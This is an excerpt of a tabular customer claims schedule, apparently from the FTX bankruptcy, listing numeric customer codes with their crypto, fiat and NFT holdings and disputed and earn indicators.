| 07384919 | | BRZ[2], CUSDT[1], DOGE[6661.32728481], USD[50.00] | | |
| 07384920 | | CUSDT[1], USD[1.69] | | |
| 07384926 | | CUSDT[8], TRX[1], USD[697.58] | | |
| 07384928 | | CUSDT[2], DOGE[1], SOL[.08587133], UNI[1.00003464], USD[0.00] | | |
| 07384931 | | USD[10.00] | | |
| 07384939 | | CUSDT[2], SOL[.00239705], USD[116.18] | | |
| 07384940 | | BTC[0.00011359], ETH[.0003], PAXG[.0000704], SOL[.0071517], SUSHI[.00000001], TRX[.032849], USD[5000.00], USDT[0.00485374] | | |
| 07384941 | | USD[0.01] | Yes | |
| 07384945 | | ETH[0], USD[0.00] | | |
| 07384950 | | DOGE[1], SOL[1.33064145], USD[0.00] | Yes | |
| 07384953 | | DOGE[2], USD[25.05] | | |
| 07384954 | | CUSDT[2], ETH[.00000397], ETHW[.43711928], USD[0.00] | Yes | |
| 07384958 | | CUSDT[2], DOGE[20.36234436], USD[0.00] | Yes | |
| 07384959 | | DOGE[2], USD[0.00] | | |
| 07384961 | | CUSDT[.47647474], TRX[.06880839], USD[0.00] | Yes | |
| 07384962 | | BRZ[1], CUSDT[23], DOGE[2.04407136], SOL[.00001495], SUSHI[.00940863], TRX[4], UNI[.00007328], USD[0.00] | | |
| 07384963 | | ETH[0], USD[0.00] | | |
| 07384968 | | ETH[0.00000001], ETHW[0], SOL[0.00000001], USD[1.00] | | |
| 07384969 | | BTC[.0000892], DOGE[6534.756], ETH[.205064], ETHW[.205064], USD[321.21] | | |
| 07384974 | | ETHW[1.76889261], NFT [537417480197135048/Entrance Voucher #3621][1], SHIB[5], USD[0.00] | | |
| 07384975 | | DOGE[2], SUSHI[.60790049], USD[0.02] | | |
| 07384976 | | DOGE[123.7704642], TRX[345.86713891], USD[0.00] | | |
| 07384980 | Contingent, Disputed | CUSDT[1], DOGE[1220.93346977], USD[0.00] | | |
| 07384982 | | USD[0.00] | | |
| 07384984 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | | |
| 07384986 | | BTC[.00087105], ETHW[.09054284], LTC[.00687], MATIC[69.99], SHIB[1], SOL[0.48000000], USD[3.89], USDT[.0028521] | | |
| 07384988 | | AAVE[.000319], BTC[.00001474], ETH[.00025501], ETHW[1.92925500], MATIC[.09], SOL[.0087703], SUSHI[.446477], USD[2.50], USDT[.5484] | | |
| 07384989 | | BTC[0], ETH[.00021868], ETHW[.00021868] | | |
| 07384991 | | TRX[0.00003475], USD[0.00] | | |
| 07384993 | | GRT[3.9962], USD[0.01], USDT[.00365563] | | |
| 07385000 | | BCH[.28664], BTC[.1469172], ETH[4.276587], ETHW[4.276587], USD[4.13] | | |
| 07385001 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07385002 | | BRZ[2], DOGE[37847.20001706], GRT[1], TRX[4], USD[0.05] | | |
| 07385006 | | BTC[0], CUSDT[2], DOGE[7.38731071], ETH[0], SOL[0], TRX[5], USD[0.00] | Yes | |
| 07385008 | | USD[10.00] | | |
| 07385010 | | USD[10.00] | | |
| 07385011 | | DOGE[1], USD[0.00] | | |
| 07385013 | | USD[0.00] | | |
| 07385014 | | ETH[0], ETHW[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07385016 | | USD[10.00] | | |
| 07385018 | | BTC[.0080948], CUSDT[1], TRX[2], USD[0.00] | | |
| 07385019 | | DOGE[1], GRT[.39540428], TRX[0.65805487], USD[0.00], USDT[0] | | |
| 07385023 | | CUSDT[4], TRX[130.89808950], USD[0.00] | | |
| 07385024 | | BTC[0.00001068], ETH[.00000026], ETHW[.00083026], SOL[.003685], USD[0.82], USDT[.93152476] | | |
| 07385027 | | DOGE[125.11737573], USD[0.00] | | |
| 07385029 | | BAT[0], DOGE[2], GRT[0], UNI[0], USD[0.01] | | |
| 07385030 | | BAT[.39375074], CUSDT[2], DOGE[532.06562883], LINK[.96429186], USD[0.00] | | |
| 07385031 | | USD[0.00] | Yes | |
| 07385032 | | BTC[.00195315], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385037 | | CUSDT[1], DOGE[29.6542734], USD[0.00] | | |
| 07385051 | | USD[0.01] | | |
| 07385056 | | DOGE[.21294562], USD[0.00], USDT[0] | | |
| 07385057 | | CUSDT[2], DOGE[2], GRT[4.91557457], USD[0.00], USDT[0.51207975] | | |
| 07385061 | | BTC[.00507654], CUSDT[9], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07385063 | | ETH[0], USD[1.33] | | |
| 07385065 | | BAT[1], BRZ[1], BTC[.00533695], CUSDT[6], DOGE[1], GRT[2], TRX[4], USD[0.01], USDT[1] | | |
| 07385077 | | GRT[4.69068524], USD[0.00] | Yes | |
| 07385079 | | BTC[.02504938], CUSDT[1], DOGE[1], ETH[.34552351], ETHW[.34552351], TRX[2], USD[0.00] | | |
| 07385082 | | CUSDT[602.3390419], DOGE[0], SUSHI[.15444061], TRX[312.59850828], USD[0.00], YFI[.00029067] | Yes | |
| 07385083 | | DOGE[2.0033645], USD[0.00] | | |
| 07385084 | | USD[10.00] | | |
| 07385085 | | BTC[.00000005], USD[0.08] | Yes | |
| 07385087 | | DOGE[11483.74066332], USD[0.00] | | |
| 07385090 | | DOGE[1.0003054], USD[0.00] | | |
| 07385092 | | BRZ[1], BTC[0], CUSDT[1], DOGE[0], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07385098 | | BCH[.01719417], USD[0.00] | Yes | |
| 07385100 | | BRZ[1], DOGE[1266.9689908], USD[0.00] | | |
| 07385102 | | CUSDT[2], DOGE[203.10811097], GRT[1], USD[0.00] | | |
| 07385103 | | BRZ[1], BTC[.00023257], CUSDT[2], DOGE[0], GRT[0], SHIB[0], SOL[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07385104 | | BTC[.00000002], DOGE[.33697717], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07385106 | | BRZ[1], CUSDT[4], DOGE[3764.3879063], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07385109 | | DOGE[1], LINK[.77023761], USD[0.00] | | |
| 07385110 | | CUSDT[4], EUR[0.00], TRX[1], USD[0.63] | Yes | |
| 07385113 | | BRZ[1], CUSDT[2], DOGE[19.98025141], USD[0.00] | | |
| 07385114 | | DOGE[0], LTC[0], SOL[0], USD[0.00] | | |
| 07385116 | | CUSDT[3], DOGE[1347.2881927], TRX[993.25819155], USD[0.00] | | |
| 07385118 | | BTC[.0000804], ETH[.017982], ETHW[.017982], LINK[.0956], LTC[.00932], NFT (320668450629686555/Reflector #380)[1], NFT (358671870740338145/Night Light #769)[1], NFT (367942605630606526/Reflection '13 #58)[1], NFT (536020960315277806/Vintage Sahara #371)[1], NFT (541929744292819528/Night Light #394)[1], SOL[.079], TRX[.22], USD[2.30] | | |
| 07385120 | | BTC[.00000194], SOL[.03112], SUSHI[.3005], TRX[.021454], USD[0.40], USDT[1.58317085] | | |
| 07385121 | | DOGE[132.14445609], USD[0.00] | | |
| 07385122 | | DOGE[0], USD[0.07] | | |
| 07385123 | | BRZ[1], BTC[.0301135], CUSDT[1], DOGE[2], ETH[.15855072], ETHW[.15793938], GRT[1.00498957], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07385125 | | DOGE[0], ETH[0], ETHW[.15850942], GRT[0], NFT (422037038565900685/SolFractal #7157)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07385126 | | BTC[.0977], USD[0.19] | | |
| 07385127 | | TRX[3670.902182], USD[10.00] | | |
| 07385128 | | CUSDT[7], DOGE[.00000004], GRT[.00049953], SUSHI[.00002586], TRX[1], USD[121.37] | | |
| 07385131 | | DOGE[7.18819198], SUSHI[1.98679496], UNI[6.11749556], USD[2.17] | Yes | |
| 07385134 | | CUSDT[1], DOGE[2696.98278345], TRX[2091.4122847], USD[0.00] | | |
| 07385135 | | BRZ[1], BTC[0], DOGE[0], TRX[1], USD[0.00], USDT[0] | | |
| 07385138 | | BAT[.792], BTC[.00019620], ETHW[.714967], GRT[399], LINK[.0979], LTC[.07133], MATIC[20], SHIB[2284700], SOL[.00833], USD[2.46], USDT[3.06851895] | | |
| 07385139 | | BRZ[1], BTC[0], DOGE[868.73653314], ETH[0], NFT (533854551244459377/Saudi Arabia Ticket Stub #1407)[1], SHIB[4], SOL[.00000001], TRX[1], USD[0.00], USDT[0.00000923] | Yes | |
| 07385141 | | USD[0.03] | | |
| 07385143 | | BAT[1.01655549], CUSDT[1], LINK[.00015983], SHIB[1], USD[125.16] | Yes | |
| 07385149 | | BAT[1], BRZ[1], CUSDT[14], DOGE[.00034539], ETHW[.09779832], GRT[1], TRX[2], USD[0.02], USDT[2] | | |
| 07385152 | | BF_POINT[300], NFT (545765867217442555/The Hill by FTX #5264)[1], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07385153 | Contingent, Disputed | USD[10.00] | | |
| 07385156 | | BAT[19.34890298], BTC[.01720311], CUSDT[26], DOGE[5622.71720861], ETH[.66178124], ETHW[.6514462], EUR[106.61], MATIC[1.26965518], SHIB[42260991.63373598], TRX[7823.58159121], USD[575.76] | Yes | |
| 07385157 | | CUSDT[1], USD[0.01] | | |
| 07385158 | | DOGE[27.21116386], GRT[0], LTC[0], USD[0.00] | | |
| 07385159 | | USD[0.00] | | |
| 07385162 | | BRZ[1], BTC[.02350098], CUSDT[1], DOGE[407.28873891], SHIB[1.02348021], SOL[5.60113583], TRX[4], USD[0.00], USDT[1.04524932] | Yes | |
| 07385163 | | BTC[.00000004], DOGE[0], USD[0.01] | Yes | |
| 07385167 | | TRX[13135.56741308], USD[0.00] | Yes | |
| 07385168 | | USD[0.17] | | |
| 07385172 | | USD[10.00] | | |
| 07385174 | | USD[11.01] | Yes | |
| 07385175 | | USD[10.00] | | |
| 07385178 | | BTC[0], ETH[0.18415456], SOL[147.28748701], USD[0.00], USDT[0.00000011] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385181 | | USD[10.00] | | |
| 07385186 | | CUSDT[1], DOGE[268.48041274], USD[0.00] | | |
| 07385187 | | BRZ[1], CUSDT[1], DOGE[240.91065891], TRX[1], USD[0.00] | Yes | |
| 07385189 | | USD[10.00] | | |
| 07385193 | | CUSDT[2], DOGE[165.41833758], TRX[.00001277], USD[0.01] | | |
| 07385196 | | DOGE[1], SOL[.09797823], USD[0.00] | Yes | |
| 07385197 | | USD[0.00] | | |
| 07385199 | | USD[10.00] | | |
| 07385203 | | USD[10.00] | | |
| 07385204 | | BRZ[1], CUSDT[1], DOGE[1], LTC[0], TRX[1.00002995], USD[0.01] | | |
| 07385206 | | USD[0.00] | | |
| 07385207 | | CUSDT[7], DOGE[.00000513], TRX[586.94524428], USD[0.01], USDT[1.0991915] | Yes | |
| 07385208 | | CUSDT[1], USD[0.00] | | |
| 07385211 | | BAT[1.14878573], BRZ[0], BTC[0], DAI[0], ETH[0], GRT[0], UNI[0], USD[0.00], USDT[0] | | |
| 07385214 | | USD[0.00] | | |
| 07385220 | | ETH[0], SOL[0], USD[0.01], USDT[0] | | |
| 07385222 | | CUSDT[2], DOGE[364.76478004], USD[0.00] | | |
| 07385223 | | GRT[0], USD[0.00] | | |
| 07385226 | | ETH[0], LINK[.00000001], SHIB[0], SOL[0], USD[8.00], USDT[0] | Yes | |
| 07385227 | | USD[3.92] | Yes | |
| 07385232 | | USD[0.00] | | |
| 07385233 | | USD[0.00], USDT[0] | | |
| 07385238 | | BRZ[1], CUSDT[3], DOGE[532.73540721], USD[0.00] | | |
| 07385241 | | DOGE[305] | | |
| 07385245 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07385253 | | BRZ[1], CUSDT[2], DOGE[1], LINK[13.04137637], USD[0.00] | | |
| 07385256 | | DOGE[1], USD[0.00] | | |
| 07385257 | | CUSDT[1], DOGE[132.51576267], SHIB[853015.11262568], TRX[1], USD[5.40] | Yes | |
| 07385261 | | BRZ[1], DOGE[151.51299159], NFT (44959031555783306/Entrance Voucher #2150)[1], TRX[1], USD[0.00] | | |
| 07385262 | | USD[10.97] | Yes | |
| 07385264 | | BF_POINT[100], LINK[0], USD[0.00], USDT[0] | Yes | |
| 07385266 | | BTC[0.01527725], DOGE[2], ETH[1.00548957], ETHW[1.47591529], LINK[54.83044240], LTC[0], NFT (32962526330452 1766/Barcelona Ticket Stub #1537)[1], SHIB[583655.0427904], SOL[0], SUSHI[79.07175029], TRX[2], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07385268 | | USD[20.81] | Yes | |
| 07385270 | | KSHIB[329.35158248], NFT (294717979278324073/ApexDucks #4737)[1], USD[0.00] | | |
| 07385275 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07385277 | | BTC[0], ETHW[.00091], USD[0.00] | | |
| 07385284 | | BTC[.00003733], DOGE[1], TRX[34.49369481], UNI[0.09736694], USD[10.72], USDT[1.66224969] | Yes | |
| 07385289 | | CUSDT[3], USD[52.87] | | |
| 07385290 | | NFT (385738590717393615/Entrance Voucher #2135)[1], NFT (477982480129536502/Good Boy #42)[1], USD[0.00] | | |
| 07385291 | | CUSDT[3], DOGE[833.8530648], USD[0.00] | Yes | |
| 07385292 | | BRZ[1], DOGE[2], TRX[0.48060501], USD[0.65] | | |
| 07385297 | | USD[10.00] | | |
| 07385299 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07385300 | | DOGE[1], USD[0.01] | | |
| 07385302 | | USD[76.93] | Yes | |
| 07385304 | | DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07385305 | | DOGE[4], USD[0.00] | | |
| 07385307 | | BF_POINT[300], ETH[0.53350666], ETHW[0.53327777], GRT[1.00367791] | Yes | |
| 07385311 | | USD[0.00] | | |
| 07385312 | | BTC[.00105716], SHIB[2], USD[0.11] | Yes | |
| 07385315 | | LINK[.39173358], USD[0.00] | | |
| 07385316 | | BF_POINT[100], NFT (478068970848557669/Coachella x FTX Weekend 1 #5303)[1] | | |
| 07385317 | | BTC[0], ETH[0], USD[0.00], USDT[0] | | |
| 07385320 | | GRT[4.53019712], USD[0.00] | | |
| 07385322 | | BRZ[2], CUSDT[13], TRX[4.00001592], USD[75.41] | | |
| 07385324 | | BRZ[1], CUSDT[12], DOGE[1552.76762349], SHIB[1687878.42830581], TRX[2], USD[0.00], USDT[0] | | |
| 07385326 | | DOGE[1], USD[0.00] | | |
| 07385327 | | USD[11.07] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385330 | | BAT[1.0165555], DOGE[1], GRT[1.00498957], TRX[2], USD[409.55] | Yes | |
| 07385331 | | DOGE[4364.73446419], LINK[0] | | |
| 07385334 | | NFT (337985910795625584/Humpty Dumpty #1424)[1] | | |
| 07385335 | | UNI[.40076585], USD[0.00] | | |
| 07385339 | | BCH[.14378894], BTC[.01435915], DOGE[805.24235639], USD[14.35], USDT[0] | Yes | |
| 07385346 | | BRZ[595.67113753], CUSDT[59.94193346], DOGE[3], GRT[197.88356703], USD[915.15] | | |
| 07385350 | | CUSDT[7], TRX[4], USD[0.55] | | |
| 07385353 | | USD[0.00] | | |
| 07385354 | | BTC[0.00084226], DOGE[2], USD[0.00] | | |
| 07385356 | | CUSDT[2], DOGE[3893.13186588], TRX[3581.04638015], USD[0.00], USDT[0.00818454] | | |
| 07385360 | | CUSDT[1], USD[81.17] | | |
| 07385361 | | BTC[0.06108024], CUSDT[1], DOGE[1], SHIB[1], SOL[30.87145698], TRX[7], USD[0.00] | Yes | |
| 07385362 | | DOGE[1], USD[0.01] | | |
| 07385367 | | BRZ[2], BTC[0], CUSDT[6], DOGE[3], ETH[0], GRT[101.88149036], LINK[4.21318788], SOL[3.06385552], SUSHI[0], TRX[2], USD[0.00], USDT[0.00000030], YFI[0] | Yes | |
| 07385371 | | USD[0.00] | | |
| 07385374 | | BAT[1], BTC[0], CUSDT[1], USD[0.00] | | |
| 07385376 | | NFT (465137434375848494/FTX - Off The Grid Miami #2574)[1] | | |
| 07385387 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07385390 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], ETH[0], ETHW[0], GRT[2], SHIB[1], TRX[5], UNI[.00000914], USD[0.00], USDT[0] | | |
| 07385393 | | LTC[21.48601453], SHIB[14837507.63896843], TRX[2], USD[0.00], USDT[1.05716471] | Yes | |
| 07385394 | | BTC[0], LINK[6.32353540], SHIB[0], USD[0.15] | | |
| 07385402 | | USD[10.00] | | |
| 07385404 | | USD[0.00] | | |
| 07385406 | | ETH[.0051323], ETHW[.0051323], USD[0.00] | | |
| 07385407 | | USD[0.00] | Yes | |
| 07385409 | | BTC[.14460525], ETH[0.92941106], ETHW[0.92941106], USD[3.00] | | |
| 07385410 | | DOGE[280.50665542], USD[0.00] | | |
| 07385411 | | DOGE[141.20141506], USD[0.00] | | |
| 07385412 | | BTC[.00866813], CUSDT[2], DOGE[1079.34213188], ETH[.08155666], ETHW[.08055248], KSHIB[3272.63671923], SHIB[28841722.22963311], TRX[2], USD[0.00] | Yes | |
| 07385414 | | DOGE[1], USD[0.00] | Yes | |
| 07385417 | | DOGE[149.08299793], USD[0.00] | | |
| 07385418 | | DOGE[227.54688352], LTC[.27581251], USD[0.00] | | |
| 07385421 | | SHIB[1], USD[0.00] | Yes | |
| 07385423 | | NFT (453151517974759367/Good Boy #112)[1], NFT (457719185535540986/Entrance Voucher #2170)[1], TRX[1], USD[0.00] | Yes | |
| 07385428 | | BTC[.0047], USD[123.95], USDT[0.00000001] | | |
| 07385429 | | USD[10.91] | Yes | |
| 07385433 | | CUSDT[3], TRX[154.0975211], USD[0.00] | | |
| 07385434 | | BTC[.00075692], CUSDT[15], DOGE[997.46569353], ETH[.00439551], ETHW[.00434079], TRX[6], USD[13.47] | Yes | |
| 07385436 | | USD[10.00] | | |
| 07385438 | | USD[10.46] | Yes | |
| 07385446 | | BRZ[1], USD[0.00] | | |
| 07385447 | | TRX[192.52676555], USD[0.00] | | |
| 07385448 | | USD[10.86] | Yes | |
| 07385449 | | BRZ[1], DOGE[1], USD[0.00] | Yes | |
| 07385452 | | USD[0.00] | | |
| 07385454 | | USD[121.98] | | |
| 07385458 | | CUSDT[4], SOL[0], USD[0.00] | | |
| 07385459 | | AVAX[26.95410989], BAT[4.1019904], BCH[.00000001], BRZ[5.00005838], BTC[.00000001], CUSDT[39.5], DOGE[2936.91950683], ETH[.00087224], ETHW[.00085861], GRT[769.41950046], KSHIB[31.66173943], LINK[.03549899], MATIC[.00010952], MKR[4.68148415], SHIB[25334630.78559950], SOL[.00089617], SUSHI[1.06738704], TRX[42881.265083], UNI[.00836773], USD[0.31], USDT[3.19681240] | Yes | |
| 07385460 | | DOGE[0], ETH[0] | | |
| 07385461 | | DOGE[101.7834968], USD[0.00] | | |
| 07385463 | | USD[10.00] | | |
| 07385464 | | BTC[0], ETH[0.00042237], ETHW[0.00042237], GRT[0], SOL[0.00654000], SUSHI[0], TRX[.000003], UNI[0], USD[0.64], USDT[0.00014300] | | |
| 07385472 | | USD[268.49] | | |
| 07385479 | | DOGE[1], TRX[2003.80362003], USD[0.00] | | |
| 07385485 | | CUSDT[3], USD[353.14] | | |
| 07385486 | | CUSDT[1], TRX[1996.88366335], USD[0.00] | | |
| 07385488 | | BRZ[1], CUSDT[3], DOGE[.00008984], TRX[1], USD[0.17] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385489 | | USD[10.00] | | |
| 07385490 | | USD[10.00] | | |
| 07385491 | | BRZ[1], CUSDT[8], ETH[.0000006], ETHW[.0000006], GRT[1], NFT (33375120637313075/Infinity #24)[1], SHIB[3850582.22079193], TRX[1], USD[0.01] | Yes | |
| 07385493 | | CUSDT[4], SOL[0], USD[0.00] | Yes | |
| 07385494 | | USD[10.00] | | |
| 07385496 | | LINK[2.24331076], USD[0.00] | Yes | |
| 07385497 | | SOL[.02], USDT[.457022] | | |
| 07385499 | | TRX[.00001481], USD[0.01] | | |
| 07385502 | | SHIB[1], USD[0.00] | | |
| 07385507 | | BRZ[1], CUSDT[1], DOGE[958.02052048], USD[0.00] | | |
| 07385515 | | USD[10.00] | | |
| 07385516 | | USD[5.07] | | |
| 07385520 | | CUSDT[2], DOGE[24.74419681], USD[0.77] | | |
| 07385524 | | DOGE[0], ETH[1.57844982], ETHW[1.57844982], SUSHI[0], TRX[0], USD[0.00] | | |
| 07385529 | | CUSDT[1], USD[0.00] | | |
| 07385530 | | BAT[.87305932], BCH[0], BTC[0.00008824], ETH[0.00066555], ETHW[0.00066555], LINK[.00000042], LTC[.0000001], SOL[.00000278], SUSHI[.12217624], UNI[.04798689], USD[0.00], USDT[1.33383886] | | |
| 07385537 | | CUSDT[1], GRT[1], USD[0.01] | | |
| 07385538 | | BRZ[1], DOGE[1], LINK[45.50845589], TRX[1], USD[0.00] | Yes | |
| 07385541 | | BTC[.00023569], USD[0.00] | | |
| 07385542 | | USD[10.00] | | |
| 07385546 | | USD[10.00] | | |
| 07385547 | | GRT[7.0853106], USD[0.00] | | |
| 07385552 | | CUSDT[4], DOGE[12.90291781], TRX[1], USD[0.00] | Yes | |
| 07385562 | | DOGE[27.46756218], USD[0.00] | | |
| 07385563 | | CUSDT[5], DOGE[.00637046], TRX[1], USD[0.00] | | |
| 07385566 | | BRZ[1], CUSDT[1], DOGE[254.67034452], USD[0.00] | | |
| 07385567 | | DOGE[207.39960638], USD[0.00] | Yes | |
| 07385574 | | BF_POINT[300], ETH[.00000037], ETHW[.00000037], NFT (36349159401526428/Solana Penguin #1202)[1], UNI[107.9753214], USD[0.00], USDT[0.00000001] | Yes | |
| 07385578 | | CUSDT[1], USD[0.41] | | |
| 07385580 | | USD[0.00] | | |
| 07385582 | | CUSDT[1], DOGE[342.53493271], USD[0.01] | | |
| 07385583 | | BRZ[2], CUSDT[6], TRX[1], USD[0.01] | | |
| 07385585 | | USD[10.00] | | |
| 07385596 | | DOGE[1], USD[0.00] | | |
| 07385599 | | AAVE[0], BF_POINT[600], BTC[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SHIB[1], SOL[0], USD[0.00], USDT[0.00001608] | Yes | |
| 07385602 | | GRT[0], SOL[26.63140025], USD[0.00] | | |
| 07385604 | | CUSDT[4], DOGE[0.00000121], GRT[45.72171741], SHIB[1], SOL[.00004499], USD[0.01] | | |
| 07385607 | | DOGE[.03655096], USD[0.00] | | |
| 07385609 | | BAT[0], BCH[0], BTC[0], CUSDT[4], DOGE[0.00002915], ETH[0], LINK[0], LTC[0], TRX[0], USD[0.00] | | |
| 07385620 | | BRZ[5.07952967], CUSDT[6], ETH[.00036519], ETHW[.00036519], GRT[2.06282945], SHIB[3], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07385622 | | USD[100.00] | | |
| 07385625 | | USD[0.24] | | |
| 07385627 | | LTC[0] | Yes | |
| 07385632 | | CUSDT[3], DOGE[0], SHIB[1557039.82577748], USD[0.00] | Yes | |
| 07385635 | | CUSDT[5], USD[0.01] | | |
| 07385637 | | BRZ[1], CUSDT[10], DOGE[51.04811888], USD[0.00] | Yes | |
| 07385641 | | DOGE[158.17561363] | | |
| 07385642 | | CUSDT[3], DOGE[0], GRT[1], TRX[2.03805551], USD[0.00], USDT[1] | | |
| 07385644 | | BTC[0], DOGE[0], SOL[0], TRX[1], USD[0.00], USDT[0.00000021] | Yes | |
| 07385646 | | USD[0.00] | | |
| 07385647 | | DOGE[1.58484922], TRX[1], USD[0.77] | | |
| 07385648 | | BRZ[3], CUSDT[5108.89903056], DOGE[2496.34216906], TRX[2917.65303888], USD[0.00] | Yes | |
| 07385651 | | SOL[.057535], USD[7.95] | | |
| 07385658 | | BAT[4.99276916], BRZ[1], CUSDT[1], DOGE[0], ETH[.00968527], ETHW[.0968527], TRX[16.30174817], USD[0.02] | | |
| 07385664 | | BAT[1], CUSDT[1], DOGE[1055.34216768], USD[0.01] | | |
| 07385666 | | USD[10.00] | | |
| 07385668 | | LTC[.04543298], USD[0.00] | | |
| 07385673 | | DOGE[459.95492999], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385675 | | USD[0.00] | | |
| 07385678 | | ETH[.00358064], ETHW[.00353957], USD[0.00] | Yes | |
| 07385681 | | ETH[.00049866], ETHW[.00049866], USD[4.00] | | |
| 07385684 | | TRX[199.93206308], USD[40.00] | | |
| 07385686 | | USD[10.00] | | |
| 07385691 | | CUSDT[2], DOGE[1], LTC[.09832988], USD[0.00] | Yes | |
| 07385692 | | USD[10.00] | | |
| 07385698 | | CUSDT[260.52546736], DOGE[68.30985087], TRX[68.56523351], USD[0.08] | Yes | |
| 07385700 | | BTC[.00060741], CUSDT[2], USD[0.00] | | |
| 07385701 | | USD[0.00], USDT[0] | | |
| 07385702 | | BAT[1], BF_POINT[100], BTC[0.00000009], DOGE[5], ETH[0], GRT[4], NFT (373508642689648541/FTX - Off The Grid Miami #396)[1], NFT (442070608763022669/Coachella x FTX Weekend 1 #6792)[1], SHIB[10], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07385705 | | NFT (515830357642551246/FTX - Off The Grid Miami #195)[1] | Yes | |
| 07385707 | | DOGE[2013.30307086], SHIB[6], SOL[1.00260607], TRX[2], USD[0.00] | Yes | |
| 07385708 | | CUSDT[1], DOGE[3.18545321], USD[0.00] | | |
| 07385709 | | CUSDT[1], DOGE[3344.21263126], USD[0.00] | Yes | |
| 07385711 | | DOGE[1], MATIC[25.10102935], USD[0.00] | | |
| 07385714 | | CUSDT[1], ETH[.00564546], ETHW[.00564546], USD[0.00] | | |
| 07385716 | | DOGE[52.76808434], TRX[1], USD[0.00] | | |
| 07385722 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07385726 | | CUSDT[2], NFT (509007059644864401/FTX - Off The Grid Miami #1918)[1], SHIB[1], USD[59.91] | Yes | |
| 07385728 | | BAT[18.51558516], DOGE[1], TRX[1000.06700448], USD[0.00] | | |
| 07385730 | | USD[0.00] | | |
| 07385734 | | BTC[.00020886], USD[0.00] | Yes | |
| 07385738 | | USD[0.00] | | |
| 07385743 | | DOGE[1], USD[23.15] | | |
| 07385745 | | BTC[.00177776], CUSDT[8], TRX[1], USD[0.40] | | |
| 07385748 | | SUSHI[.79418797], USD[0.00] | Yes | |
| 07385750 | | BRZ[1], USD[0.01], USDT[0] | | |
| 07385751 | | NFT (449468974198055061/FTX - Off The Grid Miami #2817)[1] | | |
| 07385754 | | USD[10.00] | | |
| 07385755 | | USD[0.00] | | |
| 07385756 | | USD[0.00] | Yes | |
| 07385759 | | DOGE[.001], GRT[.3], SOL[0], TRX[.563756], UNI[.0073], USD[5.84] | | |
| 07385760 | | CUSDT[1], DOGE[1315.5417376], USD[0.00] | | |
| 07385762 | | CUSDT[1], DOGE[229.85592689], TRX[3977.04180946], USD[0.14], USDT[13.36223448] | | |
| 07385764 | Contingent, Disputed | BTC[0], DOGE[1], ETH[.00000001], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[5.87878358], USD[0.00] | | |
| 07385766 | | DOGE[.13206924], USD[0.00] | | |
| 07385770 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07385771 | | BTC[0], DOGE[0.02886967], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[119.93], USDT[0] | | |
| 07385773 | | CUSDT[4], DOGE[3748.26946978], GRT[1], TRX[1], USD[0.00] | | |
| 07385774 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07385777 | | CUSDT[1], DOGE[2], SOL[69.95510017], USD[0.00], USDT[1.10083944] | Yes | |
| 07385778 | | CUSDT[4], DOGE[.27845664], TRX[1], USD[0.00] | Yes | |
| 07385779 | | BTC[0.08168161], DOGE[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07385781 | | NFT (324666245569958713/Coachella x FTX Weekend 1 #8949)[1] | | |
| 07385786 | | USD[0.05] | | |
| 07385787 | | CUSDT[2], DOGE[6216.62728779], SHIB[39619.70434305], USD[0.00], USDT[0] | Yes | |
| 07385788 | | BTC[0], ETH[0], LINK[.02460137], LTC[.0015855], SOL[35.448085], SUSHI[0.11673000], TRX[.70274], USD[21.78] | | |
| 07385792 | | DOGE[141.25518794], USD[0.00] | | |
| 07385797 | | BRZ[1], USD[0.00] | Yes | |
| 07385798 | | CUSDT[1], DOGE[139.33707044], USD[0.00] | | |
| 07385802 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07385804 | | BTC[.00019381], CUSDT[537.07490351], DOGE[24.76692671], ETH[.04616562], ETHW[.04616562], LINK[.21080883], TRX[184.42075159], USD[4.98], YFI[.00025244] | | |
| 07385805 | | DOGE[.0114277], ETH[0], ETHW[0], SHIB[1], USD[0.01] | Yes | |
| 07385806 | | BRZ[1], BTC[.00232887], CUSDT[4], DOGE[798.05512301], GRT[1], TRX[2], USD[29.08] | | |
